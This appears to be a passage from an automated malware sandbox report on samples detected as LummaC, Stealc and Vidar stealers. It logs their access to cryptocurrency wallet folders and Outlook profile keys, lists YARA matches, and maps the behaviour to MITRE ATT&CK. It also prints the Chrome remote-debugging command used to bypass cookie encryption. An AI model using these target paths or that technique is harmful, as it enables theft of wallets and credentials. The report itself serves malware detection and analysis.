Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP

Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe

Directory queried: number of queries: 1583

Source: Yara match	File source: 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2879905773.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2797964606.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2892968437.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3096193571.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2903502679.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3097797490.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2877445648.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3098474106.0000000001573000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3095820288.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2889137104.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3094627589.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2904349240.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3094047183.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3096841796.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3095179623.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3079259497.0000000001564000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file1.exe PID: 1412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file1.exe PID: 1412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000003.2029641170.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2885364496.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2408418198.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.3059189818.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.3205541238.000000000136B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3199061417.00000000087A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.3196919508.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3126061500.0000000005C71000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2927027729.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3056144256.0000000008170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3270846693.0000000006341000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3160604f40.exe PID: 5264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C810C40 sqlite3_bind_zeroblob,	0_2_6C810C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C810D60 sqlite3_bind_parameter_name,	0_2_6C810D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C738EA0 sqlite3_clear_bindings,	0_2_6C738EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C810B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C810B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C736410 bind,WSAGetLastError,	0_2_6C736410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C736070 PR_Listen,	0_2_6C736070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C73C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73C030 sqlite3_bind_parameter_count,	0_2_6C73C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7360B0 listen,WSAGetLastError,	0_2_6C7360B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C22D0 sqlite3_bind_blob,	0_2_6C6C22D0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0100EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,	23_2_0100EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0100DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,	23_2_0100DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	13 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	41 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Scheduled Task/Job	2 Bypass User Account Control	21 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	111 Registry Run Keys / Startup Folder	12 Process Injection	3 Obfuscated Files or Information	Security Account Manager	22 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
